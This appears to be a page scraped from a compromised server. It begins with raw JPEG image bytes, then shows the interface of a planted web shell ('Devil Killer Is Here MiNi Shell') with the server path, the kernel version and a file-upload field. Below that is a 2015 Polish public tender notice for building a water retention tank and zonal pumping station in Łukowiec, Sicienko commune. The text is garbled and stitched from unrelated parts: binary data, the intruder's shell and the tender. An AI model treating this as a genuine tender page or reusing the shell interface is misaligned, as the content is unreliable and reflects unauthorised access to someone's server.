JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150225/41728-N-2015.html

<p class="kh_header"><b>Sicienko: Budowa zbiornika retencyjnego wody uzdatnionej wraz z pompownią strefową na terenie działki 175/1 w miejscowości Łukowiec</b><br>
<b>Numer ogłoszenia: 41728 - 2015; data zamieszczenia: 25.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny w Sicienku , ul. Lipowa 1, 86-014 Sicienko, woj. kujawsko-pomorskie, tel. 0-52 58-70-690, faks 0-52 58-70-749.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zksicienko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zbiornika retencyjnego wody uzdatnionej wraz z pompownią strefową na terenie działki 175/1 w miejscowości Łukowiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego są roboty budowlane obejmujące budowę strefowej pompowni wody o wydajności Qhmax = 15 m3/h, zlokalizowanej na terenie działki 175/1 w miejscowości  Łukowiec. W zakresie jest również budowa wolnostojącego zbiornika retencyjnego, budowa skrzynek rozsączających, budowa ogrodzenia oraz sieci przyobiektowe wod-kan.
Podstawowy zakres prac obejmuje wykonanie:
-  sieci wodociągowej obejmującej następujące elementy:
a) włączenie projektowanego odcinka rurociągu tłocznego z przepompowni do istniejącej sieci wodociągowej,
b) odcinek rurociągu zasilającego zbiornik retencyjny wody,
c) odcinek rurociągu ssawnego zestawu pompowo-hydroforowego,
d) uzbrojenie sieci wodociągowej.
-  pompowni strefowej o wydajności maksymalnej szczytowej Qhmax= 15 m3/h, przy ciśnieniu roboczym p = 5,0 bar (sekcja gospodarcza) i wydajności dla celów p.poż:
- wydajność max: Qp.poż = 45 m3/h
- wysokość poodnoszenia: Hp.poż = 35 m słupa wody.
- zbiornika wody o pojemności użytkowej V = 100 m3.
- budynku pompowni,
- zewnętrznych instalacji przy obiektowych, kanalizacyjnych, na które składać się będą następujące rurociągi:
a) rurociąg spustowy i przelewowy wody uzdatnionej - odprowadzający wody do projektowanego systemu rozsączającego i gruntu,
b) rurociąg kanalizacji sanitarnej wraz ze zbiornikiem bezodpływowym,
c) rurociąg ścieków pochodzący z chlorowni wraz ze zbiornikiem bezodpływowym,
- ogrodzenia i zagospodarowanie terenu.
Projektowane rurociągi należy wykonać z rur i kształtek PE100, PN10, SDR17, O110x6,6, łączonych przez zgrzewanie.
Uzbrojenie projektowanego systemu wodociągowego stanowią zasuwy odcinające z przedłużonym trzpieniem i skrzynką uliczną.
Pompownia strefowa
Projektowany zbiornik retencyjny stalowy, o pojemności V = 100m3, będzie zasilany w wodę z istniejącej, w rejonie oddziaływania inwestycji, sieci wodociągowej dn-100. Dodatkowo odcinek rurociągu zasilający w wodę zbiornik retencyjny wyposażony będzie w przepustnicę z napędem elektrycznym i pozycjonerem. Przepustnica zamontowana będzie w projektowanym budynku pompowni. 
Przyjmuje się zastosowanie w głównych węzłach technologicznych przepustnic z napędem ręcznym oraz z napędem elektromechanicznym. Na rurociągu zasilającym zbiornik retencyjny należy zainstalować przepustnice z napędami ręcznymi i napędem elektromechanicznym. Przepustnica z napędem elektromechanicznym dodatkowo będzie wyposażona w pozycjoner.
Na rurociągu zasilającym dodatkowo należy zainstalować  filtr siatkowy z automatem do czasowego płukania wstecznego o następującej charakterystyce:
- przepływ przy 20 kpa: 56 m3/h
- ciśnienie robocze : min 0,15 MPa; max 1,6 MPa
- wartość kVS : 125
- ciężar : 36 kg
- praca filtra : ciągła (filtracja również w czasie płukania)
- filtr siatkowy : stal nierdzewna 100 ?m (wymienny)
- przyłącze : kołnierzowe DN 80
- obudowa : z czerwonego mosiądzu.
Charakterystyka automatu do płukania wstecznego:
- obudowa z wysokiej jakości materiału syntetycznego 
- częstotliwość płukania od 4 minut do 3 miesięcy
- zasilanie 230 V/50Hz
- stopień ochronny IP55
- przycisk ręcznego awaryjnego uruchamiania płukania.
Filtr należy wyposażyć w przewód elastyczny d-40 odprowadzający wodę z płukania filtra siatkowego poza kontener pompowni.
Na rurociągu zasilającym zbiornik retencyjny w miejscu montażu armatury w budynku pompowni należy wykonać konstrukcję wsporczą dla rurociągu z kształtowników 40x40x3 stalowych ocynkowanych lub ze stali nierdzewnej, mocowanych do ściany kontenera i podłogi.
Przyjmuje się, że wszystkie rurociągi w budynku pompowni wykonane będą z rur ciśnieniowych PE PN-10, o połączeniach zgrzewanych lub PVC, o połączeniach klejonych i kołnierzowych. Alternatywnie wszystkie rurociągi technologiczne wykonać ze stali nierdzewnej X5CrNi 18-10 (1.4301) zgodnie z PN-EN 10088-1D.
W celu podniesienia ciśnienia w sieci odbiorczej przyjmuje się zainstalowanie w budynku pompowni strefowej, zestawu hydroforowo-pompowego utrzymującego ciśnienie w sieci odbiorczej na stałym poziomie tj.: 4,5-5,0 bar, na drodze współpracy pomp II st., z przetwornikiem ciśnienia i przetwornicą obrotów silnika pompy. Praca zestawu realizowana będzie w sposób automatyczny.
Charakterystyka zestawu pompowego:
Sekcja gospodarcza:
- wydajność : Qg = 15 m3/h
- wysokość podnoszenia : Hg = 45 - 50 m słupa wody
Do celów p. poż:  
- wydajność max : Qp.poż = 45 m3/h
- wysokość  podnoszenia : Hp.poż = 45 - 50 m słupa wody
- max moc całkowita zestawu : Ns = 8,0 kW
Budynek pompowni - wykonać jako konstrukcję lekką stalową w formie kontenera prefabrykowanego wykonanego na ramie stalowej i obudowanego płytami warstwowymi. W budynku pompowni należy wydzielić pomieszczenie chlorowni oraz węzeł wc zgodnie z dokumentacją projektową. Wymiary kontenera: 2,40 m x 6,10 m x 2,80 m
Charakterystyka kontenera:
1.	konstrukcja stalowa ocynkowana, malowana na biało, 
- cynkowanie ogniowe - antykorozyjne zabezpieczenie powierzchni stalowych poprzez zanurzenie w cynku o temp. 450 st.C,
- grubość warstwy i masa cynku odniesienia do powierzchni wyrobu wg EN ISO 1461
2.	Ściany zewnętrzne - płyta warstwowa z rdzeniem styropianowym o gr. 8,0 cm
- kolor od zewnątrz i wewnątrz - RAL 9010 (biały)
- okładziny płyty wykonane z blachy stalowej o gr. 0,50 mm,
 obustronnie ocynkowanej i powlekanej lakierem poliestrowym
 (gr. warstwy cynku 275 g/m2, gr. powłoki poliestrowej 25 ?m) 
- rdzeń płyt ze styropianu samo-gasnącego odmiany PS-E FS gęstości min. 15 kg/m3
- wartość współczynnika przenikania ciepła: Uo=0,450 W/m2xK
Uo - współczynnik dla centralnej części płyty
- klasyfikacja ogniowa - NRO
- akustyka - Rw = 24dB
3.	Stropodach - płyta warstwowa z rdzeniem styropianowym o gr. 10,0 cm
- kolor od zewnątrz i od wewnątrz RAL 9010 (biały)
- wartość współczynnika przenikania ciepła; Uo= 0,366 W/m2xK
Uo - współczynnik dla centralnej części płyty
- klasyfikacja ogniowa - NRO
- odporność ogniowa - E 90
- akustyka - Rw = 24dB
4.	Podłogi brak (po montażu kontenera na płycie betonowej do wykonania posadzka w technologii na mokro o gr. 12,5 cm) zgodnie z dokumentacją projektową. Na posadzce płytki gresowe mrozoodporne w kolorze jasny popiel.
5.	Drzwi wejściowe typu H 8-5, przeciwpożarowe, pełne, biało- szare (RAL 9002), ocieplane - izolacja z włókien mineralnych, wsp.Uo=1,7 W/m2xK (wartość laboratoryjna), izolacyjność akustyczna ok. 39dB, jeden zawias sprężynowy (zamykanie samoczynne), jeden zawias konstrukcyjny zgodny z DIN 18272 św. 100/200, z dwoma zamkami - 1 szt.
6.	Okna PCV, kolor biały, wsp. szyb U=1,1 W/m2xK, wsp. okna U=1,5 W/m2xK:
- 60/60 (jedno kwaterowe; rozwieralno-uchylne) - 1 szt
- 110/60 (jedno kwaterowe; rozwieralno-uchylne) - 1 szt
7.	Krata stalowa na oknie: stała ocynkowana - 1 szt 
8.	Wentylacyjna grawitacyjna: kratki naścienne z żaluzją - 2 szt
9.	Orynnowanie PCV, kolor biały - 1 kpl
10.	Attyka płaska wys. 0,42m, kolor biały, RAL 9010
11.	Ramy kolor biały, RAL 9010
12.	Wysokość wewnętrzna Homin - 2,50m
13.	Wysokość zewnętrzna (z attyką) Hzew. - 2,80 m
Teren pompowni strefowej należy zagospodarować zgodnie z dokumentacją projektową.
Kostkę brukową grubości 8 cm, wykonać na odpowiedniej podbudowie, pozostały teren pompowni wyrównać i obsiać trawą. Wokół budynku pompowni strefowej wykonać opaskę 0,8 m od krawędzi fundamentu, z kruszywa łamanego ograniczonego obrzeżem chodnikowym.
Ponadto na rurociągu tłocznym należy zainstalować wodomierz z nadajnikiem impulsów o następującej charakterystyce:
- typ:  MWN080 NKO
- średnica: DN 80
- nominalny strumień objętości: 40 m3/h
- maksymalny strumień objętości: 200 m3/h
- minimalny strumień objętości: 0,5 m3/h

Zbiornik retencyjny wody uzdatnionej
Przyjmuje się budowę systemu magazynowania wody w postaci jednego zbiornika retencyjnego stalowego o następującej charakterystyce:
- pojemność użytkowa: 100 m3
- średnica fundamentu: 4650 mm
- średnica zbiornika bez izolacji: 4500 mm
- średnica z izolacją: 4800 mm
- wysokość: ok. 7500 mm
Ocieplenie zbiornika stanowić będzie wełna mineralna grubości 16 mm w płaszczu z blachy stalowej trapezowej w kolorze brązowym.
Wokół zbiornika należy wykonać opaskę 1,0 m od krawędzi zbiornika z kruszywa łamanego ograniczoną obrzeżem chodnikowym. Pozostały teren wyłożyć kostką brukową zgodnie z dokumentacją projektową.
Zbiornik jako produkt w całości powinien posiadać atest PZH.

Rurociąg spustowy i przelewowy wody uzdatnionej należy wykonać z rur ciśnieniowych PE, PN-6 łączonych przez zgrzewanie.
System rozsączający należy wykonać jako pakiet - zestaw skrzynek rozsączających o podstawowej charakterystyce:
- pojemność: min. 20m3,
- wymiary w planie: ok. 8,0 m x 4,8 m,
- wykonanie: tworzywo sztuczne,
- obciążenie dopuszczalne trwałe: min. 3,5 tony/m2.
Wykonanie pakietu oraz jego posadowienie i montaż należy wykonać zgodnie z zaleceniami i wytycznymi producenta lub dostawcy.
Rurociąg kanalizacji sanitarnej należy wykonać z rur kanalizacyjnych PVC, d-110 łączonych kielichowo na uszczelkę gumową. Ścieki należy odprowadzać do zbiornika bezodpływowego wykonanego jako szczelny, z kręgów żelbetowych z dnem monolitycznym szczelnym, dn-1200 mm.
Zbiornik należy wyposażyć w płytę stropową żelbetową d-1400 mm oraz właz żeliwny d-600 mm typu ciężkiego i rurę wentylacyjną PVC. Zbiornik obustronnie izolować powłoką bitumiczną. Zbiornik posadowić na zagęszczonej podsypce  piaskowej.
Zbiornik bezodpływowy na ścieki pochodzące z chlorowni należy wykonać analogicznie jak zbiornik na ścieki sanitarne.
Dla projektowanej pompowni i zbiornika retencyjnego należy wyznaczyć strefę ochrony bezpośredniej wygrodzoną siatką stalową w osłonie z tworzywa koloru zielonego np. ogrodzenie z paneli systemowych, po uprzednim wykonaniu podmurówki betonowej o wysokości ok. 50 cm. 
Ogrodzenie należy wyposażyć w furtkę oraz bramę wjazdową o szer. 3,0 m. Na terenie ochrony bezpośredniej przede wszystkim należy zapewnić:
- odprowadzenie wód opadowych w taki sposób, aby nie mogły one przedostawać się do urządzeń służących do eksploatacji obiektu,
- zagospodarowanie terenu zielenią,
- na ogrodzeniu należy umieścić tablice informacyjne o następującej treści:

STREFA OCHRONY BEZPOŚREDNIEJ POMPOWNI STREFOWEJ
I ZBIORNIKA RETENCYJNEGO WODY W ŁUKOWCU
WŁASNOŚĆ GMINY SICIENKO


Zasilanie w energię elektryczną.
Zakres prac dla branży elektrycznej obejmuje wykonanie wewnętrznych linii zasilających - zalicznikowych od złącza kablowo pomiarowego na działce nr 181/2 w granicy działki 175/1 zgodnie z zakresem opracowania dla branży elektrycznej.

Po zrealizowaniu robót budowlano-montażowych należy uporządkować teren, na którym były prowadzone prace.

Na Wykonawcy robót spoczywał będzie obowiązek zapewnienia pełnej obsługi geodezyjnej w zakresie realizowanych prac z inwentaryzacją geodezyjną powykonawczą włącznie.
Wykonawca będzie również zobowiązany uzyskać opinie organów wymienionych w art.56 Prawa budowlanego w celu uzyskania pozytywnych decyzji na użytkowanie obiektu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w elementach dokumentacji technicznej - opisy i mapy, które stanowią załącznik 10 do SIWZ.  


Zamawiający zastrzega sobie prawo do ograniczenia lub odstąpienia od realizacji umowy w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
Uwaga:
Wykonawca zobowiązany będzie do wykonania wszystkich prac, zgodnie z dokumentacją techniczną, warunkami pozwolenia na budowę, oraz zasadami sztuki budowlanej. Projekt umowy stanowi załącznik  8 do SIWZ. Celem ułatwienia przygotowania oferty przetargowej Zamawiający (pomocniczo) jako załącznik 9 do SIWZ załącza przedmiar robót, który określa niezbędne podstawowe roboty do wykonania zamówienia. Pragniemy zwrócić uwagę, że dokument ten ma jedynie ułatwić dokonanie wyceny, nie może jednak być podstawą do dokonywania rozliczenia całego zamówienia, na które zawarta umowa będzie miała charakter UMOWY RYCZAŁTOWEJ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.52-2, 45.23.21.50-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zapewni, jako część swojej oferty wadium w wysokości 5.000,- zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ma szczególnych wymagań dla uznania , że wykonawca spełnia warunek uprawnień do wykonywania określonej działalności. Dla uznania, że wykonawca spełnia powyższy warunek zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania , że wykonawca spełnia warunek wiedzy i doświadczenia, zamawiający wymaga by wykazał, iż wykonał w okresie ostatnich 5 lat przed dniem składania ofert, a jeśli okres prowadzenia jest krótszy - w tym okresie, roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia - zgodnie z załącznikiem nr 4 do SIWZ. W  wykazie tym należy ująć wszystkie roboty budowlane tożsame w zakresie oraz wartości z przedmiotem zamówienia wraz z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym zamawiający wymaga , by wykonawca wykazał iż dysponuje sprzętem w ilości pozwalającej na sprawne zrealizowanie zamówienia i dotrzymanie terminu jego zrealizowania, w szczególności koparki, spycharki, sprzęt do zagęszczania gruntu, środki transportu, elektronarzędzia - zgodnie z załącznikiem nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający wymaga, by wykonawca :
- złożył oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień zgodnie z załącznikiem nr 3 do SIWZ.
- złożył wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami w szczególności: w specjalności sieci kanalizacyjnych lub osobami posiadającymi inne uprawnienia umożliwiające wykonywanie tych samych czynności do wykonania których, w aktualnym stanie prawnym, uprawniają uprawnienia budowlane tych specjalności - zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek sytuacji ekonomicznej i finansowej, zamawiający wymaga, by wykonawca wykazał posiadanie opłaconej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 250.000 zł dokument określony w § 6 pkt.I ppkt.5 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

